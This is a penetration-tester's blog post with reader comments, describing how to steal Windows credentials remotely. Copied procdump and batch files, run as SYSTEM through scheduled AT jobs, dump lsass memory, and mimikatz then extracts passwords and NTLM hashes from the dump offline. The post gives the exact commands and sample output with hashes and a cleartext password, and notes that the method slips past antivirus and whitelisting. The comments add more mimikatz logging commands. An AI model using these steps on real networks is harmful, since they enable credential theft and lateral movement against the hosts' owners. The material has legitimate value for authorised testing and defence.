carnal0wnage [Shared Reader]

Wednesday, July 31, 2013

Mimikatz Minidump and mimikatz via bat file

I tweeted about this blog post a few weeks ago and got to use it on a PT, so its no secret...

also mubix beat me to this post, but i'm posting it here for my notes keeping purposes

First, check out this post by the mimikatz author.  Now, one of the twitter comments I received was: "duh anyone can right click and dump process memory to a file". Unfortunately i'm rarely sitting with a GUI and can just "right click" but i do usually have the ability to "net use" and create scheduled tasks.  The cool thing about AT jobs and scheduled tasks is that if you run them as "admin" they really get run as SYSTEM, so you can do neat stuff like dump lsass memory or get SYSTEM shells when the job executes your binary.

So quickly how I've been doing it.

Once you have creds, you net use the remote box and copy over procdump.exe and procdump.bat

contents of procdump.bat


@echo off
C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\somethingwindows.dmp 2>&1

then just create an "at" job to run it for you

at \\192.168.1.3 20:55 C:\windows\temp\procdump.bat


From there you'll have a dump file, copy it back from the remote host and use mimikatz alpha to retrieve the creds from the dump file:  from the mimikatz blog post:


mimikatz # sekurlsa :: minidump lsass.dmp
Switch to minidump

mimikatz # sekurlsa :: logonPasswords

Authentication Id: 0; 141237
User Name: sekur_000
Domain: WINDOWS-8
        msv:
         * Username: sekurlsa@live.fr
         * Domain: MicrosoftAccount
         * LM: d0e9aee149655a6075e4540af1f22d3b
         * NTLM: cc36cf7a8514893efccd332446158b1a
        tspkg:
         * Username: sekurlsa@live.fr
         * Domain: MicrosoftAccount
         * Password: waza1234 /
        WDigest:
         * Username: sekurlsa@live.fr
         * Domain: MicrosoftAccount
         * Password: waza1234 /
        livessp:
         * Username: sekurlsa@live.fr
         * Domain: ps: password
         * Password: waza1234 /
        kerberos:
        ssp:

Why not just push up mimikatz?  Well, mimikatz you download is now tagged by AV, so you can compile you own and get around that, white listing tools should prevent mimikatz from running but will probably allow sysinternals tools or powershell,  but mostly this method make it so you don't need a meterpreter sessions or other type of interactive shell on the remote host. run bat file, get your dump file, and get creds offline.

------

if for some reason you want to run mimikatz via a bat file you can use the following commands

type schtask.bat

C:\temp\mimikatz64.exe "sekurlsa::logonPasswords full" exit >> C:\temp\mimi.txt

then you can run it with an at job.

-CG

4 comments:

dummys said...

Hi you can use the log method of mimikatz. E.g.

Mimikatz.exe "log sekurlsa::logonpassword" exit
And you will get a"mimikatz.log".
Regards

CG said...

didnt know that. thanks!

Jabra said...

meterpreter> use mimikatz
[..snip..]
> help
(will now list mimikatz commands)

Anonymous said...

to log results -
log c:\mypath\log.txt
-0xsauby